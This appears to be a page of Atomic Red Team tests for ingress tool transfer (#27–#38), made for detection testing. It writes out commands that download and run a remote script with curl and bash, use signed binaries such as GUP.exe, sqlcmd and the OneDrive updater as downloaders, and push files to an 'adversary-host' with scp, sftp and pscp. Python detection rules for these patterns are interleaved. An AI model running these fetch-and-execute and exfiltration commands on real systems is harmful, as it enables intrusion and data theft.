Utilize Linux curl to download a remote file, chmod +x it and run it.

Supported Platforms: Linux

auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_url | url of remote payload | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh |
| payload_name | payload name | string | atomic.sh |

Attack Commands: Run with sh!

curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}

Cleanup Commands:

rm #{payload_name}
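
Test #27's command joins chmod +x and bash with a pipe, so the shell starts both at once and bash runs the script whether or not the execute bit is already set; a detection that waits for chmod before the run can miss it. The following added example (not Atomic Red Team code) correlates constructed exec events into "downloaded by curl, then run" alerts and records chmod only as corroboration. The event shape (ts, cwd, argv), the function names and the simplified curl option parsing are assumptions of this example.

```python
import posixpath
import re
from urllib.parse import urlparse

INTERPRETERS = {"sh", "bash", "dash", "zsh"}


def resolve(cwd, path):
    """Absolute, normalized form of a path as seen from the process's cwd."""
    return posixpath.normpath(posixpath.join(cwd, path))


def curl_output_path(argv, cwd):
    """Where a curl invocation writes its download, or None if it writes to stdout.

    Simplified: handles -o/--output FILE, -O/--remote-name and bundled short
    flags such as -sO; other value-taking options are not modelled.
    """
    url = out = None
    remote_name = False
    args = iter(argv[1:])
    for arg in args:
        if arg in ("-o", "--output"):
            out = next(args, None)
        elif arg == "--remote-name":
            remote_name = True
        elif arg.startswith("-") and not arg.startswith("--"):
            flags = arg[1:]
            if "O" in flags:              # e.g. -sO: keep the remote file name
                remote_name = True
            if flags.endswith("o"):       # e.g. -so FILE
                out = next(args, None)
        elif "://" in arg:
            url = arg
    if out is None and remote_name and url:
        out = posixpath.basename(urlparse(url).path)
    return resolve(cwd, out) if out else None


def adds_exec(mode):
    """True if a chmod mode argument sets any execute bit (755, +x, u+x, a+rx)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return bool(int(mode, 8) & 0o111)
    return any("x" in clause.partition("+")[2] for clause in mode.split(","))


def correlate(events, window=300):
    """Alert when a file written by curl is executed within `window` seconds."""
    downloads, chmodded, alerts = {}, set(), []
    for ev in sorted(events, key=lambda e: e["ts"]):
        argv, cwd = ev["argv"], ev["cwd"]
        prog = posixpath.basename(argv[0])
        if prog == "curl":
            path = curl_output_path(argv, cwd)
            if path:
                downloads[path] = ev["ts"]
            continue
        if prog == "chmod":
            if len(argv) >= 3 and adds_exec(argv[1]):
                targets = (resolve(cwd, t) for t in argv[2:])
                chmodded.update(p for p in targets if p in downloads)
            continue
        if prog in INTERPRETERS:
            # First non-option argument is the script the interpreter reads.
            script, via = next((a for a in argv[1:] if not a.startswith("-")), None), prog
        else:
            # Direct execution by path; bare names come from PATH, not the drop dir.
            script, via = (argv[0] if "/" in argv[0] else None), "direct"
        if script is None:
            continue
        path = resolve(cwd, script)
        if path in downloads and ev["ts"] - downloads[path] <= window:
            alerts.append({"path": path, "via": via, "chmod_seen": path in chmodded})
    return alerts


# Constructed events. The first three mirror Test #27 with its default inputs;
# bash is logged before chmod to model the concurrent pipeline.
EVENTS = [
    {"ts": 100, "cwd": "/tmp", "argv": ["curl", "-sO",
     "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh"]},
    {"ts": 101, "cwd": "/tmp", "argv": ["bash", "atomic.sh"]},
    {"ts": 101, "cwd": "/tmp", "argv": ["chmod", "+x", "atomic.sh"]},
    {"ts": 200, "cwd": "/home/dev", "argv": ["curl", "-fsSL", "-o", "tool", "https://example.com/tool"]},
    {"ts": 201, "cwd": "/home/dev", "argv": ["chmod", "755", "tool"]},
    {"ts": 202, "cwd": "/home/dev", "argv": ["./tool", "--help"]},
    {"ts": 300, "cwd": "/home/dev", "argv": ["bash", "build.sh"]},  # never downloaded
]

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```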


Atomic Test #28 - Nimgrab - Transfer Files

Use nimgrab.exe to download a file from the web.

Supported Platforms: Windows

auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| destination_path | Destination path to file | path | $env:TEMP\Atomic-license.txt |

Attack Commands: Run with command_prompt!

cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}

Cleanup Commands:

del #{destination_path} >nul 2>&1

Dependencies: Run with powershell!

Description: NimGrab must be installed on system.
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"


Atomic Test #29 - iwr or Invoke Web-Request download

Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.

Supported Platforms: Windows

auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Local path to place file | path | %temp%\Atomic-license.txt |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}

Cleanup Commands:

del %temp%\Atomic-license.txt >nul 2>&1


Atomic Test #30 - Arbitrary file download using the Notepad++ GUP.exe binary

GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files (.zip) from the internet/GitHub. Upon execution, a sample zip file will be downloaded to the C:\Temp\Sample folder.

Supported Platforms: Windows

auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| target_file_url | URL of the target ZIP file (Eg: https://example.com/test.zip) | url | https://getsamplefiles.com/download/zip/sample-2.zip |
| working_dir | The directory where GUP.exe & its dependencies exist | path | PathToAtomicsFolder\T1105\bin\ |
| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | String | PathToAtomicsFolder\T1105\bin\GUP.exe |
| target_file_sha256 | SHA256 value of target ZIP file | string | CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6 |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"

Cleanup Commands:

rmdir /s /q "C:\Temp\Sample" >nul 2>nul

Dependencies: Run with powershell!

Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
Check Prereq Commands:
if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"


Atomic Test #31 - File download via nscurl

Use nscurl to download and write a file/payload from the internet. -k disables certificate checking; -o sets the output destination.

Supported Platforms: macOS

auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| destination_path | Local path to place remote file | path | license.txt |

Attack Commands: Run with sh!

nscurl -k "#{remote_file}" -o "#{destination_path}"

Cleanup Commands:

rm "#{destination_path}"


Atomic Test #32 - File Download with Sqlcmd.exe

Sqlcmd.exe, one of the Windows packages, can be abused to download malicious files from C2 servers. This atomic exhibits similar behavior by downloading a sample zip file from the src directory of this technique's folder via a GitHub URL.

Supported Platforms: Windows

auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | URL of the C2 Server from where file/s need to be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip |
| local_file_path | The local file path along with filename to where the file needs to be downloaded and placed. | path | C:\T1105.zip |

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

sqlcmd -i #{remote_url} -o #{local_file_path}

Cleanup Commands:

rm "#{local_file_path}" 2>$null | Out-Null

Dependencies: Run with powershell!

Description: The Windows package 'Sqlcmd' needs to be available on the machine to execute this atomic successfully
Check Prereq Commands:
if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
Get Prereq Commands:
winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
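
A detection-side example for Atomic Tests #29 to #32, added here and not part of the Atomic Red Team project: it classifies process command lines against the download patterns those tests produce, keying on the URL and the output flag rather than on -URI, which test #29 notes is optional. The labels, regexes and sample command lines are constructed for illustration; abbreviated PowerShell parameter names such as -OutF and the case-sensitivity of sqlcmd switches are general tool behaviour, not something this page states.

```python
import re

URL = re.compile(r"https?://[^\s\"']+", re.I)
# PowerShell binds any unambiguous parameter prefix, so -OutF ... -OutFile are equivalent.
OUTFILE = re.compile(r"(?<!\S)-outf(?:i(?:le?)?)?(?!\S)", re.I)
IWR = re.compile(r"(?<![\w-])(?:iwr|invoke-webrequest)(?![\w-])", re.I)
GUP = re.compile(r"(?<![\w-])gup(?:\.exe)?(?!\w).*\s-unzipto(?!\S)", re.I)
# sqlcmd switches are case-sensitive: only lowercase -i names an input file.
SQLCMD = re.compile(r"(?<![\w-])(?i:sqlcmd(?:\.exe)?)(?!\w).*\s-i\s*\"?(?i:https?)://")
NSCURL = re.compile(r"(?<![\w-])nscurl(?!\w)", re.I)
NSCURL_OUT = re.compile(r"(?<!\S)-o(?!\S)")
NSCURL_NOVERIFY = re.compile(r"(?<!\S)-k(?!\S)")


def classify(cmdline):
    """Return labels of the Atomic Test patterns (#29-#32) a command line matches."""
    hits = []
    has_url = URL.search(cmdline) is not None
    # Test #29: do not key on -URI; the URL can also be passed positionally.
    if IWR.search(cmdline) and has_url and OUTFILE.search(cmdline):
        hits.append("29:iwr-outfile")
    # Test #30: the updater fetches the URL carried inside its last argument.
    if GUP.search(cmdline) and has_url:
        hits.append("30:gup-unzipto")
    # Test #31: download to disk; -k additionally disables certificate checking.
    if NSCURL.search(cmdline) and has_url and NSCURL_OUT.search(cmdline):
        hits.append("31:nscurl-output")
        if NSCURL_NOVERIFY.search(cmdline):
            hits.append("31:nscurl-no-cert-check")
    # Test #32: the input "script" is a URL rather than a local .sql path.
    if SQLCMD.search(cmdline):
        hits.append("32:sqlcmd-url-input")
    return hits


# Constructed process-creation command lines (page defaults substituted; not captured logs).
SAMPLES = [
    r"powershell.exe iwr -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -Outfile C:\Users\lab\AppData\Local\Temp\Atomic-license.txt",
    r"powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -OutF C:\Temp\l.txt",
    r'GUP.exe -unzipTo "" "C:\Temp" "Sample https://getsamplefiles.com/download/zip/sample-2.zip CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"',
    r"sqlcmd -i https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip -o C:\T1105.zip",
    r'nscurl -k "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" -o "license.txt"',
    r"sqlcmd -i C:\scripts\nightly.sql -o C:\logs\nightly.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["no match"], "<-", line[:60])
```

The last sample is a routine sqlcmd run with a local input file and produces no match, which is the distinction the test #32 rule relies on.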


Atomic Test #33 - Remote File Copy using PSCP

Copy a staged file using PSCP.exe to a public target location.

Supported Platforms: Windows

auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pscp_url | pscp.exe download path | string | https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe |
| pscp_binary | PSCP binary location | string | PathToAtomicsFolder\..\ExternalPayloads\pscp.exe |
| scp_user | Username of the SCP user | string | atomic |
| scp_password | Password for the SCP User | string | atomic |
| scp_port | port for the remote server | string | 22 |
| exfil_package | path to exfil package | path | C:\Temp\T1105_scp.zip |
| target_location | Remote location where the data will be copied to. | string | 127.0.0.1 |
| target_filename | Filename on the destination. | string | T1105_scp.zip |

Attack Commands: Run with command_prompt!

fsutil file createnew C:\Temp\T1105_scp.zip 1048576
echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}

Cleanup Commands:

del /f /q #{exfil_package}

Dependencies: Run with powershell!

Description: pscp.exe must be available on the system.
Check Prereq Commands:
if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"


Atomic Test #34 - Windows push file using scp.exe

This test simulates pushing files using SCP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | path | /tmp/ |
| remote_host | Remote host to send | string | adversary-host |
| local_path | Local path to copy from | path | C:\temp |
| file_name | Name of the file to transfer | string | T1105.txt |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
    New-Item -Path $folderPath -ItemType Directory
}
 
# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"
 
# Attack command
scp.exe #{local_path}\#{file_name} #{username}@#{remote_host}:#{remote_path}

Cleanup Commands:

$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force -erroraction silentlycontinue
Write-Output "File deleted: $filePath"

Dependencies: Run with powershell!

Description: This test requires the scp command to be available on the system.
Check Prereq Commands:
if (Get-Command scp -ErrorAction SilentlyContinue) {
    Write-Output "SCP command is available."
    exit 0
} else {
    Write-Output "SCP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #35 - Windows pull file using scp.exe

This test simulates pulling files using SCP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 401667dc-05a6-4da0-a2a7-acfe4819559c

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to pull | path | /tmp/T1105.txt |
| remote_host | Remote host to pull from | string | adversary-host |
| local_path | Local path to receive files | path | C:\temp |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}

Dependencies: Run with powershell!

Description: This test requires the scp command to be available on the system.
Check Prereq Commands:
if (Get-Command scp -ErrorAction SilentlyContinue) {
    Write-Output "SCP command is available."
    exit 0
} else {
    Write-Output "SCP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #36 - Windows push file using sftp.exe

This test simulates pushing files using SFTP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 205e676e-0401-4bae-83a5-94b8c5daeb22

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | path | /tmp |
| remote_host | Remote host to send | string | adversary-host |
| local_path | Local path to receive sftp | path | C:\temp |
| file_name | Name of the file to transfer | string | T1105.txt |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
    New-Item -Path $folderPath -ItemType Directory
}
# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"
# Attack command
echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path}

Cleanup Commands:

$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force
Write-Output "File deleted: $filePath"

Dependencies: Run with powershell!

Description: This test requires the sftp command to be available on the system.
Check Prereq Commands:
if (Get-Command sftp -ErrorAction SilentlyContinue) {
    Write-Output "SFTP command is available."
    exit 0
} else {
    Write-Output "SFTP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #37 - Windows pull file using sftp.exe

This test simulates pulling files using SFTP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of file to pull | path | /tmp/T1105.txt |
| remote_host | Remote host to pull from | string | adversary-host |
| local_path | Local path to receive files | path | C:\temp |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}

Dependencies: Run with powershell!

Description: This test requires the sftp command to be available on the system.
Check Prereq Commands:
if (Get-Command sftp -ErrorAction SilentlyContinue) {
    Write-Output "SFTP command is available."
    exit 0
} else {
    Write-Output "SFTP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #38 - Download a file with OneDrive Standalone Updater

Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys. This technique can be used to download files without executing anomalous executables. Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/

Supported Platforms: Windows

auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | URL to download file from | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| onedrive_path | Path to OneDrive Standalone Updater executable | path | C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe |

Attack Commands: Run with powershell!

if (-not (Test-Path "#{onedrive_path}")) {
    Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
    exit 1
}
 
New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force
 
# Run OneDrive Standalone Updater
& "#{onedrive_path}"

Cleanup Commands:

Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore

Dependencies: Run with powershell!

Description: OneDriveStandaloneUpdater.exe must exist on disk at specified location
Check Prereq Commands:
if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path."
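
A detection-side example for Atomic Test #38, added here and not part of the Atomic Red Team project: it reviews registry value-write events for URL overrides under the UpdateOfficeConfig key that the test populates, and rates a user's writes higher when all three URL values and the timestamp appear together. The event field names (user, key, value_name, data), the allow-listed host, the severity labels and the sample events are assumptions constructed for illustration; the key and value names come from the test above.

```python
from urllib.parse import urlsplit

KEY_SUFFIX = r"\software\microsoft\onedrive\updateofficeconfig"
URL_VALUES = {"updateringsettingurlfromoc", "odsuupdatexmlurlfromoc", "updatexmlurlfromoc"}
TIMESTAMP_VALUE = "updateofficeconfigtimestamp"


def review(events, allowed_hosts=frozenset()):
    """Group registry writes by user and report URL overrides under UpdateOfficeConfig."""
    per_user = {}
    for ev in events:
        if not ev["key"].lower().endswith(KEY_SUFFIX):
            continue
        state = per_user.setdefault(ev["user"], {"urls": {}, "timestamp": False})
        name = ev["value_name"].lower()
        if name in URL_VALUES:
            state["urls"][name] = str(ev["data"])
        elif name == TIMESTAMP_VALUE:
            state["timestamp"] = True
    findings = []
    for user, state in sorted(per_user.items()):
        hosts = {(urlsplit(u).hostname or "<unparsed>").lower() for u in state["urls"].values()}
        unexpected = sorted(h for h in hosts if h not in allowed_hosts)
        if not unexpected:
            continue
        # All three URL values plus the timestamp is the full set written by Atomic Test #38.
        complete = set(state["urls"]) == URL_VALUES and state["timestamp"]
        findings.append({"user": user, "hosts": unexpected,
                         "severity": "high" if complete else "medium"})
    return findings


# Constructed events; field names are assumptions, map them from your own registry telemetry.
KEY = r"HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig"
TEST_URL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt"
SAMPLE = (
    [{"user": "lab\\alice", "key": KEY, "value_name": n, "data": TEST_URL}
     for n in ("UpdateRingSettingURLFromOC", "ODSUUpdateXMLUrlFromOC", "UpdateXMLUrlFromOC")]
    + [{"user": "lab\\alice", "key": KEY, "value_name": "UpdateOfficeConfigTimestamp", "data": 99999999999},
       {"user": "lab\\bob", "key": KEY, "value_name": "UpdateXMLUrlFromOC", "data": "https://files.example.test/u.xml"},
       {"user": "lab\\carol", "key": KEY, "value_name": "UpdateXMLUrlFromOC", "data": "https://allowed.example.test/u.xml"}]
)

if __name__ == "__main__":
    for finding in review(SAMPLE, allowed_hosts={"allowed.example.test"}):
        print(finding)
```

The allow-list is deliberately a parameter: which update hosts are expected in a given environment has to come from that environment's own baseline.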